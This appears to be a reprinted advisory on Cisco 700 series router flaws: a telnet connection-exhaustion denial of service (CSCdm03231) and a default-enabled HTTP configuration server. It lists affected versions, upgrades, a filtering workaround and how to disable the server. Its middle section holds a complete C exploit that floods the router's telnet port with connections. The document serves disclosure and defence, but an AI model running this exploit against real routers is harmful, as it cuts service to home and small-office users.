COMMAND

    cisco

SYSTEMS AFFECTED

    All  versions  of  IOS/700  on  all  Cisco  700 series routers are
    vulnerable. The 700 series includes all models in the 760 and  770
    series  including  the  762M,  766M,  772M,  and  the  776M.   All
    international models in this series are also vulnerable.

PROBLEM

    Following  vulnerabilities  were   primarily  researched  by   Dan
    Ingevaldson  of  the  ISS  X-Force  and  the  individuals at Cisco
    Systems.

    The  first  vulnerability,  which  has  been assigned Cisco bug ID
    CSCdm03231, can  be used  to cause  system reloads,  and therefore
    denial of service,  using TCP connections  to the routers'  TELNET
    ports.

    The second  vulnerability has  not been  assigned a  bug ID.   7xx
    routers running software versions 3.2(5) through 4.2(3) support  a
    simple HTTP server  (ClickStart). This HTTP  server is enabled  by
    default.   Unless the  server is  explicitly disabled,  it can  be
    used to make changes to  the router configuration, and/or to  gain
    information  about  that   configuration.   This  is   intentional
    behavior, but is mentioned in this notice because it appears  that
    customers have been caught unawares by it.

    Only  networks  incorporating  7xx series small-office/home-office
    routers are affected  by these vulnerabilities.   7xx routers  are
    designed to provide network connectivity for small remote networks
    using ISDN BRI lines. If your network includes 7xx series routers,
    they are most likely to be found in the homes of network users, or
    in remote offices with no  more than a few employees.   CSCdm03231
    affects all Cisco 7xx routers, running any software version up  to
    and including release 4.2(3), whose administrators have not  taken
    specific steps to filter incoming TCP connections.  Such filtering
    is not enabled by default. Routers running release 4.3(1) or later
    software  are  not  affected  by  CSCdm03231.   The HTTP server is
    present  in  all  software  releases  from  3.2(5) through 4.2(3),
    inclusive.   The  server  is  enabled  by  default in all of these
    software versions.

    Impact of CSCdm03231
    --------------------
        CSCdm03231 permits a remote attacker to force a 7xx router  to
        reload, denying service to  the router's home or  small office
        user.   It may  sometimes be  possible to  degrade performance
        without  actually  inducing  a  router  reload.   The   attack
        consumes    relatively    little    bandwidth    compared   to
        flooding-based denial  of service  attacks. In  all cases, the
        router will recover after the attack stops; the attacker  must
        send  traffic  continuously  to  maintain  denial  of service.
        However, if the router has reloaded, the end user may have  to
        take some installation-dependent action to cause the router to
        redial the ISDN connection.  This vulnerability does not  give
        attackers access  to the  router CLI,  nor does  it give  them
        any other way of controlling the router beyond inducing denial
        of service. Sample exploit for this vulnerability:

    /* Cisco 760 Series Connection Overflow
     *
     *
     * Written by: Tiz.Telesup
     * Affected Systems: Routers Cisco 760 Series, I havn't tested anymore
     * Tested on: FreeBSD 4.0 and Linux RedHat 6.0
     */
    
    
    #include <sys/types.h>
    #include <sys/ioctl.h>
    #include <sys/socket.h>
    #include <sys/time.h>
    #include <arpa/inet.h>
    #include <netdb.h>
    #include <net/if.h>
    #include <netinet/in.h>
    #include <errno.h>
    #include <fcntl.h>
    #include <stdarg.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    
    
    int     net_connect (struct sockaddr_in *cs, char *server,
            unsigned short int port, char *sourceip,
            unsigned short int sourceport, int sec);
    
    
    void    net_write (int fd, const char *str, ...);
    
    
    unsigned long int       net_resolve (char *host);
    
    
    
    
    void
    usage (void)
    {
            printf ("usage: ./cisco host times\n");
            exit (EXIT_FAILURE);
    }
    
    
    int
    main (int argc, char *argv[])
    {
    
    
            char                    host[256];
            int                     port,times,count,sd = 0;
            int                     m = 0;
            struct sockaddr_in      cs;
    
    
            printf ("Cisco 760 series Connection Overflow.\n");
            printf ("-------------------------------------\n");
    
            if (argc < 3)
            usage();
    
            strcpy (host, argv[1]);
            times=atoi (argv[2]);
    
            if ((times < 1) || (times > 10000)) /*Maximum number of connections*/
                    usage();
    
    
    
            port =23; /* This might be changed to the telnet port of the router*/
    
    
    
            printf ("Host: %s Times: %d\n", host, times);
            for (count=0;count<times;count++){
                    printf ("Connecting... Connection number %d \n",count);
                    fflush (stdout);
                    sd = net_connect (&cs, host, port, NULL, 0, 30);
    
    
                    if (sd < 1) {
                            printf ("failed!\n");
                            exit (EXIT_FAILURE);
                            }
    
    
    
                    net_write (sd, "AAAA\n\n");
    
    
            }
    
    
            exit (EXIT_SUCCESS);
    }
    
    
    int
    net_connect (struct sockaddr_in *cs, char *server, unsigned short int port, char *sourceip,
                    unsigned short int sourceport, int sec)
    {
            int             n, len, error, flags;
            int             fd;
            struct timeval  tv;
            fd_set          rset, wset;
    
    
            /* first allocate a socket */
            cs->sin_family = AF_INET;
            cs->sin_port = htons (port);
    
    
            fd = socket (cs->sin_family, SOCK_STREAM, 0);
            if (fd == -1)
                    return (-1);
    
    
            if (!(cs->sin_addr.s_addr = net_resolve (server))) {
                    close (fd);
                    return (-1);
            }
    
    
            flags = fcntl (fd, F_GETFL, 0);
            if (flags == -1) {
                    close (fd);
                    return (-1);
            }
            n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
            if (n == -1) {
                    close (fd);
                    return (-1);
            }
    
    
            error = 0;
    
    
            n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
            if (n < 0) {
                    if (errno != EINPROGRESS) {
                            close (fd);
                            return (-1);
                    }
            }
            if (n == 0)
                    goto done;
    
    
            FD_ZERO(&rset);
            FD_ZERO(&wset);
            FD_SET(fd, &rset);
            FD_SET(fd, &wset);
            tv.tv_sec = sec;
            tv.tv_usec = 0;
    
    
            n = select(fd + 1, &rset, &wset, NULL, &tv);
            if (n == 0) {
                    close(fd);
                    errno = ETIMEDOUT;
                    return (-1);
            }
            if (n == -1)
                    return (-1);
    
    
            if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
                    if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
                            len = sizeof(error);
                            if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
                                    errno = ETIMEDOUT;
                                    return (-1);
                            }
                            if (error == 0) {
                                    goto done;
                            } else {
                                    errno = error;
                                    return (-1);
                            }
                    }
            } else
                    return (-1);
    
    
    done:
            n = fcntl(fd, F_SETFL, flags);
            if (n == -1)
                    return (-1);
            return (fd);
    }
    
    
    unsigned long int
    net_resolve (char *host)
    {
            long            i;
            struct hostent  *he;
    
    
            i = inet_addr(host);
            if (i == -1) {
                    he = gethostbyname(host);
                    if (he == NULL) {
                            return (0);
                    } else {
                            return (*(unsigned long *) he->h_addr);
                    }
            }
            return (i);
    }
    
    
    void
    net_write (int fd, const char *str, ...)
    {
            char    tmp[8192];
            va_list vl;
            int     i;
    
    
            va_start(vl, str);
            memset(tmp, 0, sizeof(tmp));
            i = vsnprintf(tmp, sizeof(tmp), str, vl);
            va_end(vl);
    
    
            send(fd, tmp, i, 0);
            return;
    }


    Impact of the Presence of the HTTP Server
    -----------------------------------------
        If the HTTP server  is enabled, it can  be used to change  the
        router's configuration, or to retrieve information about  that
        configuration. No special tools are required.

    A  simple  program  is  needed  to effectively exploit CSCdm03231.
    Although  Cisco  knows  of  no  program  available  to  the public
    specifically  for  this  purpose,  writing  such  a  program would
    require very  little effort,  and only  the most  basic of  skill.
    Also,  certain  publicly-available  programs  intended  for  other
    purposes could be  used or adapted  to exploit the  vulnerability.
    Cisco has had no  reports of abuse of  the HTTP server on  the 7xx
    series.   However, the  potential for  abuse is  discussed in  the
    product  documentation,  and  must  be  considered  to be known to
    potential attackers.

SOLUTION

    CSCdm03231  affects  all  software  versions  earlier than 4.3(1).
    Customers  with  76x  or  77x  routers  should  upgrade to release
    4.3(1).   Because  of  memory  limitations,  release  4.3  is  not
    supported on the  75x routers; customers  with 75x routers  should
    use IP filtering as described  in the "Workarounds" section.   The
    HTTP  server  is  present  in  all  software  versions from 3.2(5)
    through 4.2(3). It is not  present in 3.2(4) or earlier  releases,
    nor is it present in 4.3. Customers with 76x or 77x routers should
    upgrade to release 4.3(1),  primarily because of the  desirability
    of installing the CSCdm03231 fix. The HTTP server may be  disabled
    in any software version;  disabling the server is  the recommended
    course  of  action  for  customers  with  75x  routers.   Cisco is
    offering  free  software  upgrades  to  remedy  CSCdm03231 for all
    vulnerable customers,  regardless of  contract status.   Customers
    with  service  contracts  may  upgrade  to  any  software version,
    although they may  only install the  feature sets they've  already
    purchased.   Customers without  contracts may  upgrade to  version
    4.3(1).

    Workaround for CSCdm03231
    -------------------------
    CSCdm03231 can be made much less useful to attackers by preventing
    incoming TCP connections to the router from untrusted hosts.  This
    can be  done with  the set  ip filter  profile command,  as in the
    following example:

        set ip filter tcp source = not trusted-host destination = router block

    This example  would configure  the router  to accept  incoming TCP
    connections only from a single trusted administrative host.   More
    elaborate configurations, permitting connections of various  types
    from various hosts, are possible; see the router documentation for
    more information.

    Disabling the HTTP Server
    -------------------------
    The HTTP server may be disabled with the system command

        Router> set clickstart off